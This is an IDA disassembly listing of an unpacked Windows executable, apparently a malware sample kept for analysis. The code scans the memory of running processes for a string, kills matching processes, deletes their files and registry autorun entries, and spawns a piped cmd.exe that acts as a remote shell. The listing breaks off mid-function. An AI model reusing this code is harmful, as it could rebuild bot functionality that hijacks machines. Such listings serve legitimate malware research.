;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 9D7CA52080FC6F6E1B8471C5B1FAD5A2
; File Name : u:\work\9d7ca52080fc6f6e1b8471c5b1fad5a2_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00021000 ( 135168.)
; Section size in file : 00021000 ( 135168.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_packed segment para public 'CODE' use32
assume cs:_packed
;org 401000h
assume es:nothing, ss:nothing, ds:_packed, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401146+31�p
; sub_401146+43�p ...
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = byte ptr -260h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = byte ptr -218h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 268h
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_40101A
; ---------------------------------------------------------------------------
loc_401013: ; CODE XREF: sub_401000+13C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40101A: ; CODE XREF: sub_401000+11�j
mov eax, [ebp+var_4]
cmp off_418000[eax*4], 0
jz loc_401141
mov eax, [ebp+var_4]
push off_418000[eax*4]
lea eax, [ebp+var_260]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_260]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_110]
push eax
push 3
push 0
lea eax, [ebp+var_260]
push eax
push [ebp+arg_0]
call dword_417008 ; RegOpenKeyExA
and [ebp+var_220], 0
jmp short loc_401081
; ---------------------------------------------------------------------------
loc_401074: ; CODE XREF: sub_401000:loc_40112B�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_401081: ; CODE XREF: sub_401000+72�j
mov [ebp+var_21C], 104h
mov [ebp+var_224], 104h
lea eax, [ebp+var_224]
push eax
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_114]
push eax
push 0
lea eax, [ebp+var_21C]
push eax
lea eax, [ebp+var_218]
push eax
push [ebp+var_220]
push [ebp+var_110]
call dword_417000 ; RegEnumValueA
mov [ebp+var_264], eax
cmp [ebp+var_264], 0
jz short loc_4010DD
jmp short loc_401130
; ---------------------------------------------------------------------------
loc_4010DD: ; CODE XREF: sub_401000+D9�j
cmp [ebp+var_114], 1
jnz short loc_40112B
push [ebp+arg_4]
push [ebp+var_224]
lea eax, [ebp+var_10C]
push eax
call sub_407ACA
add esp, 0Ch
mov [ebp+var_268], eax
cmp [ebp+var_268], 0
jz short loc_40112B
lea eax, [ebp+var_218]
push eax
push [ebp+var_110]
call dword_417004 ; RegDeleteValueA
test eax, eax
jnz short loc_40112B
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40112B: ; CODE XREF: sub_401000+E4�j
; sub_401000+10B�j ...
jmp loc_401074
; ---------------------------------------------------------------------------
loc_401130: ; CODE XREF: sub_401000+DB�j
push [ebp+var_110]
call dword_417028 ; RegCloseKey
jmp loc_401013
; ---------------------------------------------------------------------------
loc_401141: ; CODE XREF: sub_401000+25�j
mov eax, [ebp+var_8]
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401146 proc near ; CODE XREF: sub_401244+459�p
; sub_40A9CF+A72�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push 80h
push [ebp+arg_0]
call dword_4170A8 ; SetFileAttributesA
test eax, eax
jnz short loc_401166
jmp locret_401242
; ---------------------------------------------------------------------------
loc_401166: ; CODE XREF: sub_401146+19�j
push [ebp+arg_0]
call dword_4170AC ; DeleteFileA
push [ebp+arg_0]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov [ebp+var_4], eax
push [ebp+arg_0]
push 80000002h
call sub_401000
pop ecx
pop ecx
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
cmp [ebp+var_4], 0
jnz locret_401242
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_108]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_10C], eax
jmp short loc_4011DB
; ---------------------------------------------------------------------------
loc_4011CE: ; CODE XREF: sub_401146:loc_40121A�j
mov eax, [ebp+var_10C]
dec eax
mov [ebp+var_10C], eax
loc_4011DB: ; CODE XREF: sub_401146+86�j
cmp [ebp+var_10C], 0
jz short loc_40121C
mov eax, [ebp+arg_0]
add eax, [ebp+var_10C]
movsx eax, byte ptr [eax-1]
cmp eax, 5Ch
jnz short loc_40121A
push 104h
mov eax, [ebp+var_10C]
lea eax, [ebp+eax+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_40121C
; ---------------------------------------------------------------------------
loc_40121A: ; CODE XREF: sub_401146+AE�j
jmp short loc_4011CE
; ---------------------------------------------------------------------------
loc_40121C: ; CODE XREF: sub_401146+9C�j
; sub_401146+D2�j
lea eax, [ebp+var_108]
push eax
push 80000001h
call sub_401000
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
push 80000002h
call sub_401000
pop ecx
pop ecx
locret_401242: ; CODE XREF: sub_401146+1B�j
; sub_401146+56�j
leave
retn
sub_401146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401244 proc near ; DATA XREF: sub_4017AA+9D�o
var_3E8 = dword ptr -3E8h
var_3E4 = byte ptr -3E4h
var_3E0 = dword ptr -3E0h
var_3DC = dword ptr -3DCh
var_3D8 = dword ptr -3D8h
var_3D4 = dword ptr -3D4h
var_3D0 = dword ptr -3D0h
var_3CC = byte ptr -3CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = byte ptr -2A8h
var_2A7 = dword ptr -2A7h
var_2A3 = byte ptr -2A3h
var_1A3 = byte ptr -1A3h
var_B = byte ptr -0Bh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3E8h
push esi
push edi
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2AC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_40129D
lea eax, [ebp+var_2A3]
push eax
mov eax, [ebp+var_2AC]
push dword ptr [eax]
push offset dword_418144
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 10h
loc_40129D: ; CODE XREF: sub_401244+34�j
call sub_406041
mov [ebp+var_2B4], eax
cmp [ebp+var_2B4], 0
jnz short loc_4012C4
push [ebp+var_2AC]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4017A4
; ---------------------------------------------------------------------------
loc_4012C4: ; CODE XREF: sub_401244+6B�j
push 10000h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2B8], eax
and [ebp+var_2BC], 0
and [ebp+var_2B0], 0
jmp short loc_4012F2
; ---------------------------------------------------------------------------
loc_4012E5: ; CODE XREF: sub_401244+E2�j
; sub_401244+12B�j ...
mov eax, [ebp+var_2B0]
inc eax
mov [ebp+var_2B0], eax
loc_4012F2: ; CODE XREF: sub_401244+9F�j
mov eax, [ebp+var_2B4]
mov ecx, [ebp+var_2B0]
cmp ecx, [eax]
jge loc_401710
mov esi, [ebp+var_2B0]
imul esi, 114h
mov eax, [ebp+var_2B4]
mov edi, [eax+4]
call dword_4170E8 ; GetCurrentProcessId
cmp [edi+esi], eax
jnz short loc_401328
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_401328: ; CODE XREF: sub_401244+E0�j
push 104h
lea eax, [ebp+var_3CC]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp+var_3CC]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_401374
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401374: ; CODE XREF: sub_401244+129�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
movzx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
add eax, 11h
push eax
call dword_417094 ; OpenProcess
mov [ebp+var_2C4], eax
cmp [ebp+var_2C4], 0
jnz short loc_4013B7
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_4013B7: ; CODE XREF: sub_401244+16C�j
and [ebp+var_2C0], 0
and [ebp+var_2C8], 0
loc_4013C5: ; CODE XREF: sub_401244:loc_4016FA�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp+var_2C0]
cmp eax, 10000h
jbe short loc_4013F7
mov [ebp+var_3E8], 10000h
jmp short loc_40141C
; ---------------------------------------------------------------------------
loc_4013F7: ; CODE XREF: sub_401244+1A5�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp+var_2C0]
mov [ebp+var_3E8], eax
loc_40141C: ; CODE XREF: sub_401244+1B1�j
mov eax, [ebp+var_3E8]
mov [ebp+var_3D0], eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_3D0]
push [ebp+var_2B8]
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+4]
add eax, [ebp+var_2C0]
push eax
push [ebp+var_2C4]
call dword_417098 ; ReadProcessMemory
mov [ebp+var_3D4], eax
cmp [ebp+var_3D4], 0
jz loc_4016C5
cmp [ebp+var_2C8], 0
jz loc_4016C5
and [ebp+var_3D8], 0
and [ebp+var_3DC], 0
loc_401495: ; DATA XREF: .packed:0041AD00�o
jmp short loc_4014A4
; ---------------------------------------------------------------------------
loc_401497: ; CODE XREF: sub_401244:loc_4015DB�j
mov eax, [ebp+var_3DC]
inc eax
mov [ebp+var_3DC], eax
loc_4014A4: ; CODE XREF: sub_401244:loc_401495�j
mov eax, [ebp+var_2C8]
sub eax, [ebp+var_2A7]
cmp [ebp+var_3DC], eax
ja loc_4015E0
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
cmp eax, ecx
jz short loc_401514
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
add ecx, 20h
cmp eax, ecx
jz short loc_401514
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
sub ecx, 20h
cmp eax, ecx
jnz loc_4015DB
loc_401514: ; CODE XREF: sub_401244+290�j
; sub_401244+2AD�j
mov [ebp+var_3E0], 1
jmp short loc_40152D
; ---------------------------------------------------------------------------
loc_401520: ; CODE XREF: sub_401244:loc_4015D6�j
mov eax, [ebp+var_3E0]
inc eax
mov [ebp+var_3E0], eax
loc_40152D: ; CODE XREF: sub_401244+2DA�j
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
test eax, eax
jnz short loc_401556
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
mov [ebp+var_3D8], eax
jmp loc_40179F
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: sub_401244+2F9�j
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp+var_3E0]
loc_401584: ; DATA XREF: sub_42E43F+B0�w
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
sub ecx, 20h
cmp eax, ecx
jz short loc_4015D6
jmp short loc_4015DB
; ---------------------------------------------------------------------------
loc_4015D6: ; CODE XREF: sub_401244+338�j
; sub_401244+363�j ...
jmp loc_401520
; ---------------------------------------------------------------------------
loc_4015DB: ; CODE XREF: sub_401244+2CA�j
; sub_401244+390�j
jmp loc_401497
; ---------------------------------------------------------------------------
loc_4015E0: ; CODE XREF: sub_401244+272�j
; sub_401244:loc_40179F�j
cmp [ebp+var_3D8], 0
jz loc_4016C5
mov eax, [ebp+var_2BC]
inc eax
mov [ebp+var_2BC], eax
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_401675
push 3E8h
call dword_41709C ; Sleep
mov al, [ebp+var_B]
mov [ebp+var_3E4], al
and [ebp+var_B], 0
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp+var_2A3]
push eax
push offset dword_41811C
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 14h
mov al, [ebp+var_3E4]
mov [ebp+var_B], al
jmp short loc_4016A3
; ---------------------------------------------------------------------------
loc_401675: ; CODE XREF: sub_401244+3BF�j
push 0
push [ebp+var_2C4]
call dword_4170A0 ; TerminateProcess
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_401146
pop ecx
loc_4016A3: ; CODE XREF: sub_401244+42F�j
mov eax, [ebp+var_2AC]
cmp dword ptr [eax+4], 0
jz short loc_4016C0
push [ebp+var_2C4]
call dword_4170A4 ; CloseHandle
jmp loc_40179A
; ---------------------------------------------------------------------------
loc_4016C0: ; CODE XREF: sub_401244+469�j
jmp loc_401795
; ---------------------------------------------------------------------------
loc_4016C5: ; CODE XREF: sub_401244+230�j
; sub_401244+23D�j ...
mov eax, [ebp+var_2C0]
add eax, [ebp+var_3D0]
mov [ebp+var_2C0], eax
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov edx, [ebp+var_2C0]
cmp edx, [ecx+eax+8]
jnz short loc_4016FA
jmp short loc_4016FF
; ---------------------------------------------------------------------------
loc_4016FA: ; CODE XREF: sub_401244+4B2�j
jmp loc_4013C5
; ---------------------------------------------------------------------------
loc_4016FF: ; CODE XREF: sub_401244+4B4�j
; sub_401244:loc_401795�j
push [ebp+var_2C4]
call dword_4170A4 ; CloseHandle
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401710: ; CODE XREF: sub_401244+BC�j
; sub_401244:loc_40179A�j
push [ebp+var_2B4]
call sub_40636E
pop ecx
push [ebp+var_2B8]
call sub_416B4C ; free
pop ecx
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_401785
push 3E8h
call dword_41709C ; Sleep
cmp [ebp+var_2BC], 0
jnz short loc_401764
lea eax, [ebp+var_2A3]
push eax
push offset dword_4180F8
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_401785
; ---------------------------------------------------------------------------
loc_401764: ; CODE XREF: sub_401244+501�j
lea eax, [ebp+var_2A3]
push eax
push [ebp+var_2BC]
push offset dword_4180CC
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 10h
loc_401785: ; CODE XREF: sub_401244+4ED�j
; sub_401244+51E�j
push [ebp+var_2AC]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_4017A4
; ---------------------------------------------------------------------------
loc_401795: ; CODE XREF: sub_401244:loc_4016C0�j
jmp loc_4016FF
; ---------------------------------------------------------------------------
loc_40179A: ; CODE XREF: sub_401244+477�j
jmp loc_401710
; ---------------------------------------------------------------------------
loc_40179F: ; CODE XREF: sub_401244+30D�j
jmp loc_4015E0
; ---------------------------------------------------------------------------
loc_4017A4: ; CODE XREF: sub_401244+7B�j
; sub_401244+54F�j
pop edi
pop esi
leave
retn 4
sub_401244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017AA proc near ; CODE XREF: sub_40A9CF+AA1�p
; sub_40A9CF+AD2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_4017C2
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
test eax, eax
jnz short loc_4017C7
loc_4017C2: ; CODE XREF: sub_4017AA+9�j
jmp locret_401854
; ---------------------------------------------------------------------------
loc_4017C7: ; CODE XREF: sub_4017AA+16�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4017DD
jmp short locret_401854
; ---------------------------------------------------------------------------
loc_4017DD: ; CODE XREF: sub_4017AA+2F�j
mov eax, [ebp+var_4]
mov cl, [ebp+arg_8]
mov [eax+4], cl
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+5], eax
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 9
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 109h
push eax
call sub_405F67
pop ecx
pop ecx
movzx eax, [ebp+arg_8]
test eax, eax
jz short loc_401830
mov [ebp+var_8], offset aListing ; "Listing"
jmp short loc_401837
; ---------------------------------------------------------------------------
loc_401830: ; CODE XREF: sub_4017AA+7B�j
mov [ebp+var_8], offset aKilling ; "Killing"
loc_401837: ; CODE XREF: sub_4017AA+84�j
push [ebp+arg_4]
push [ebp+var_8]
push offset dword_418174
push 0
push [ebp+var_4]
push offset sub_401244
call sub_4095A4
add esp, 18h
locret_401854: ; CODE XREF: sub_4017AA:loc_4017C2�j
; sub_4017AA+31�j
leave
retn
sub_4017AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401856 proc near ; CODE XREF: sub_401981+A8�p
; sub_401981+E1�p ...
push ebp
mov ebp, esp
cmp dword_41DEB4, 0FFFFFFFFh
jz short loc_40186E
push dword_41DEB4
call dword_4170A4 ; CloseHandle
loc_40186E: ; CODE XREF: sub_401856+A�j
cmp dword_41DEA8, 0FFFFFFFFh
jz short loc_401883
push dword_41DEA8
call dword_4170A4 ; CloseHandle
loc_401883: ; CODE XREF: sub_401856+1F�j
cmp dword_41DEAC, 0FFFFFFFFh
jz short loc_401898
push dword_41DEAC
call dword_4170A4 ; CloseHandle
loc_401898: ; CODE XREF: sub_401856+34�j
cmp dword_41DEB0, 0FFFFFFFFh
jz short loc_4018AD
push dword_41DEB0
call dword_4170A4 ; CloseHandle
loc_4018AD: ; CODE XREF: sub_401856+49�j
pop ebp
retn
sub_401856 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018AF proc near ; CODE XREF: sub_401981+28A�p
; sub_401981+395�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 200h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jnz short loc_4018D4
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401922
loc_4018D4: ; CODE XREF: sub_4018AF+15�j
; sub_4018AF:loc_401920�j
push 32h
call dword_41709C ; Sleep
mov eax, [ebp+arg_0]
loc_4018DF: ; DATA XREF: .RLPack:0042E764�o
movsx eax, byte ptr [eax+189h]
test eax, eax
jz short loc_4018FE
call sub_416B64 ; clock
sub eax, dword_41DEBC
cmp eax, 1F4h
jb short loc_4018FE
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_4018FE: ; CODE XREF: sub_4018AF+39�j
; sub_4018AF+4B�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401920
call sub_416B64 ; clock
sub eax, dword_41DEBC
cmp eax, 0FAh
jb short loc_401920
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_401920: ; CODE XREF: sub_4018AF+5B�j
; sub_4018AF+6D�j
jmp short loc_4018D4
; ---------------------------------------------------------------------------
loc_401922: ; CODE XREF: sub_4018AF+23�j
; sub_4018AF+4D�j ...
call sub_416B64 ; clock
mov dword_41DEBC, eax
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_401942
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_401957
loc_401942: ; CODE XREF: sub_4018AF+86�j
push offset dword_4181A4
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
jmp short loc_40196E
; ---------------------------------------------------------------------------
loc_401957: ; CODE XREF: sub_4018AF+91�j
push 200h
push [ebp+arg_4]
lea eax, [ebp+var_200]
push eax
call sub_407A56
add esp, 0Ch
loc_40196E: ; CODE XREF: sub_4018AF+A6�j
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
leave
retn
sub_4018AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401981 proc near ; DATA XREF: sub_401D6E+88�o
var_730 = dword ptr -730h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = dword ptr -720h
var_714 = dword ptr -714h
var_510 = byte ptr -510h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_334 = dword ptr -334h
var_330 = word ptr -330h
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = byte ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = byte ptr -30Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 730h
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_714]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
sub eax, 1F4h
mov dword_41DEBC, eax
push 0
lea eax, [ebp+var_30C]
push eax
push 104h
push 0
push offset aCmd_exe ; "cmd.exe"
push 0
call dword_41706C ; SearchPathA
test eax, eax
jnz short loc_4019ED
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_4019ED: ; CODE XREF: sub_401981+57�j
mov [ebp+var_318], 0Ch
mov [ebp+var_310], 1
and [ebp+var_314], 0
push 0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_368]
push eax
lea eax, [ebp+var_364]
push eax
call dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A41
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A41: ; CODE XREF: sub_401981+A6�j
push 0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_36C]
push eax
lea eax, [ebp+var_728]
push eax
call dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A7A
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A7A: ; CODE XREF: sub_401981+DF�j
push 3
push 0
push 0
push offset dword_41DEB0
call dword_417074 ; GetCurrentProcess
push eax
push [ebp+var_36C]
call dword_417074 ; GetCurrentProcess
push eax
call dword_4170F0 ; DuplicateHandle
test eax, eax
jnz short loc_401ABB
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401ABB: ; CODE XREF: sub_401981+120�j
push 10h
push 0
lea eax, [ebp+var_724]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 44h
push 0
lea eax, [ebp+var_360]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_360], 44h
mov [ebp+var_334], 101h
and [ebp+var_330], 0
mov eax, [ebp+var_728]
mov [ebp+var_328], eax
mov eax, [ebp+var_368]
mov [ebp+var_324], eax
mov eax, [ebp+var_368]
mov [ebp+var_320], eax
lea eax, [ebp+var_724]
push eax
lea eax, [ebp+var_360]
push eax
push 0
push 0
push 0
push 1
push 0
push 0
push offset byte_41DEC0
lea eax, [ebp+var_30C]
push eax
call dword_41707C ; CreateProcessA
test eax, eax
jnz short loc_401B69
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401B69: ; CODE XREF: sub_401981+1CE�j
push [ebp+var_728]
call dword_4170A4 ; CloseHandle
mov eax, [ebp+var_364]
mov dword_41DEB4, eax
mov eax, [ebp+var_36C]
mov dword_41DEA8, eax
mov eax, [ebp+var_724]
mov dword_41DEAC, eax
push [ebp+var_720]
call dword_4170A4 ; CloseHandle
and [ebp+var_4], 0
and [ebp+var_208], 0
loc_401BAD: ; CODE XREF: sub_401981+2E9�j
; sub_401981+39C�j
mov eax, [ebp+var_714]
cmp dword ptr [eax+4], 0
jz short loc_401BBE
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401BBE: ; CODE XREF: sub_401981+236�j
and [ebp+var_208], 0
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 200h
lea eax, [ebp+var_204]
push eax
push dword_41DEB4
call dword_417080 ; PeekNamedPipe
test eax, eax
jnz short loc_401C17
push offset aCouldNotReadDa ; "Could not read data from process."
lea eax, [ebp+var_510]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C17: ; CODE XREF: sub_401981+27C�j
cmp [ebp+var_4], 0
jnz short loc_401C6F
mov [ebp+var_730], 103h
lea eax, [ebp+var_730]
push eax
push dword_41DEAC
call dword_417084 ; GetExitCodeProcess
test eax, eax
jz short loc_401C62
cmp [ebp+var_730], 103h
jz short loc_401C62
push offset aCmd_exeProcess ; "Cmd.exe process has terminated."
lea eax, [ebp+var_510]
push eax
call sub_40D53F
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C62: ; CODE XREF: sub_401981+2BB�j
; sub_401981+2C7�j
push 0Ah
call dword_41709C ; Sleep
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401C6F: ; CODE XREF: sub_401981+29A�j
and [ebp+var_72C], 0
jmp short loc_401C85
; ---------------------------------------------------------------------------
loc_401C78: ; CODE XREF: sub_401981:loc_401CAF�j
mov eax, [ebp+var_72C]
inc eax
mov [ebp+var_72C], eax
loc_401C85: ; CODE XREF: sub_401981+2F5�j
mov eax, [ebp+var_72C]
cmp eax, [ebp+var_4]
jnb short loc_401CB1
mov eax, [ebp+var_72C]
movsx eax, [ebp+eax+var_204]
cmp eax, 0Ah
jnz short loc_401CAF
mov [ebp+var_208], 1
jmp short loc_401CB1
; ---------------------------------------------------------------------------
loc_401CAF: ; CODE XREF: sub_401981+320�j
jmp short loc_401C78
; ---------------------------------------------------------------------------
loc_401CB1: ; CODE XREF: sub_401981+30D�j
; sub_401981+32C�j
cmp [ebp+var_208], 0
jz short loc_401CC6
mov eax, [ebp+var_72C]
inc eax
mov [ebp+var_4], eax
jmp short loc_401CCD
; ---------------------------------------------------------------------------
loc_401CC6: ; CODE XREF: sub_401981+337�j
mov [ebp+var_4], 200h
